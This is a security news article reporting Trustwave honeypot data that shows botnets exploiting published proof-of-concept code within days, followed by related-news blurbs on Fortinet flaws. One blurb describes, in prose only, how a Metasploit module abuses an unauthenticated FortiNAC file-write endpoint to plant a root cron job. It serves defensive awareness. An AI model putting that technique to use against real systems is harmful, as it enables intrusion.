Headline
Botnets Send Exploits Within Days to Weeks After Published PoC
Six months of honeypot data finds that 19% of traffic to sensors were malicious exploit attempts, and 95% of those attempts came from just three botnets.
Attackers quickly turn around real-world attacks using proof-of-concept code, taking only days to weeks to create workable exploits from published research, according to six months of data collected by researchers at Trustwave.
During the experiment, Trustwave deployed honeypots that mimicked five common enterprises appliances, finding that attackers began exploiting one vulnerability within six days of the release of proof-of-concept (PoC) code and another within 17 days. Overall, the researchers found that exploit scans, which include legitimate scanning of the Internet by security professionals as well as attackers, accounted for 25% of HTTP and HTTPS requests, while actual attacks accounted for 19% of traffic to the newly created servers. Nearly all the attacks came from three specific botnets: Mozi, Mirai, and Kinsing.
Companies should assume that attackers will be able to reverse engineer any patch and develop their own exploit, even without a proof of concept, says Ziv Mador, vice president of security research at Trustwave.
“It’s essential to stay aware of the constant stream of newly discovered vulnerabilities, take proactive measures, and apply patches promptly to minimize the window of opportunity for threat actors,” he says.
The research highlights not only that attackers are quickly using exploit code, but that attacks are quickly automated by plugging into existing botnet infrastructure. Of the 19% of traffic that attempted to exploit the researchers’ honeypots, 73% came from the Mozi botnet, 14% from the Kinsing botnet, and 9% came from the Mirai botnet.
All three botnets tend to focus on Internet of Things (IoT) and edge devices, such as managed file servers, mail servers, network gateways, and industrial control systems that manage operational technology. Mozi, for example, is a peer-to-peer botnet that started by infecting network gateways and digital video recording devices, but evolved to exploit vulnerabilities in network gateway appliances. Recent updates to the Mirai botnet include the ability to exploit bugs in Tenda and Zyxel networking appliances.
Currently, Mozi is very aggressive in its efforts to find as many unprotected IoT devices as possible, says Allen West, a security researcher with Akamai.
“Security has historically not been as much of a priority on IoT devices, yet they make up a huge portion of the Internet landscape,” he says. “If it can send traffic, it’s good enough to be used as a bot. Attackers, most notably Mirai, have acknowledged this and built their entire operation around this idea.”
Grabbing Code on the Fly
To conduct the research, cybersecurity experts at Trustwave SpiderLabs deployed honeypots in six different countries for five different devices — Fortra GoAnywhere MFT, Microsoft Exchange, Fortinet FortiNAC, Atlassian BitBucket, and F5 Big-IP — to emulate vulnerable enterprise networks. They collected data from more than 38,000 IP addresses, including at least 1,100 unique payloads, the researchers stated in their analysis.
The honeypots had some capability to interact with attackers, using a “medium-interaction honeypot,” attempting to fool the intruders into believing that their exploit had worked. However, the honeypots did not extend the charade beyond that basic level. Following an exploit attempt, attackers typically run _wget_ or _curl_ to download the next stage of the attack, but rather than run the command, the honeypot merely attempted to download the next stage for analysis, says Trustwave’s Mador.
“Our honeypots were configured as true vulnerable applications and that’s how they appeared in services like Shodan,” Mador says. “We successfully captured several Web shells, which are commonly used by individuals or groups involved in such activities, but due to the medium-interaction nature of our honeypot, we were unable to track the subsequent actions that attackers may have taken.”
The honeypots detected an attack against Fortra GoAnywhere MFT, a managed file transfer service, in the US and UK that attempted to upload a previously unreported Web shell. The researchers also detected attacks that targeted a vulnerability in Fortinet FortiNAC appliance (CVE-2022-39952) within six days of PoC exploit code being released. Other attacks targeted Atlassian Bitbucket servers and F5 Big-IP devices.
Should Every Company Have a Honeypot?
While quickly patching edge and IoT devices should be a priority, organizations should also prioritize those devices for which PoC exploits have been released or are being attacked in the wild.
Nonetheless, Mador suggests that companies should consider deploying honeypots of their own.
“When existing security measures do not offer adequate visibility into these attacks, the deployment of a honeypot can be a valuable option to consider,” he says. “Honeypots act as additional layers of defense, luring attackers and providing valuable insights into their tactics and techniques.”
Related news
The China-linked threat actor known as Earth Lusca has been observed targeting government entities using a never-before-seen Linux backdoor called SprySOCKS. Earth Lusca was first documented by Trend Micro in January 2022, detailing the adversary's attacks against public and private sector entities across Asia, Australia, Europe, North America. Active since 2021, the group has relied on
Fortinet has rolled out updates to address a critical security vulnerability impacting its FortiNAC network access control solution that could lead to the execution of arbitrary code. Tracked as CVE-2023-33299, the flaw is rated 9.6 out of 10 for severity on the CVSS scoring system. It has been described as a case of Java untrusted object deserialization. "A deserialization of untrusted data
This Metasploit module uploads a payload to the /tmp directory in addition to a cron job to /etc/cron.d which executes the payload in the context of the root user. The core vulnerability is an arbitrary file write issue in /configWizard/keyUpload.jsp which is accessible remotely and without authentication. When you send the vulnerable endpoint a ZIP file, it will extract an attacker controlled file to a directory of the attackers choice on the target system. This issue is exploitable on FortiNAC versions 9.4 prior to 9.4.1, FortiNAC versions 9.2 prior to 9.2.6, FortiNAC versions 9.1 prior to 9.1.8, all versions of FortiNAC 8.8, all versions of FortiNAC 8.7, all versions of FortiNAC 8.6, all versions of FortiNAC 8.5, and all versions of FortiNAC 8.3.
Fortinet has released fixes to address 15 security flaws, including one critical vulnerability impacting FortiOS and FortiProxy that could enable a threat actor to take control of affected systems. The issue, tracked as CVE-2023-25610, is rated 9.3 out of 10 for severity and was internally discovered and reported by its security teams. "A buffer underwrite ('buffer underflow') vulnerability in
Organizations are urged to update to the latest versions of FortiNAC to patch a flaw that allows unauthenticated attackers to write arbitrary files on the system.
Fortinet has released security updates to address 40 vulnerabilities in its software lineup, including FortiWeb, FortiOS, FortiNAS, and FortiProxy, among others. Two of the 40 flaws are rated Critical, 15 are rated High, 22 are rated Medium, and one is rated Low in severity. Top of the list is a severe bug residing in the FortiNAC network access control solution (CVE-2022-39952, CVSS score: 9.8)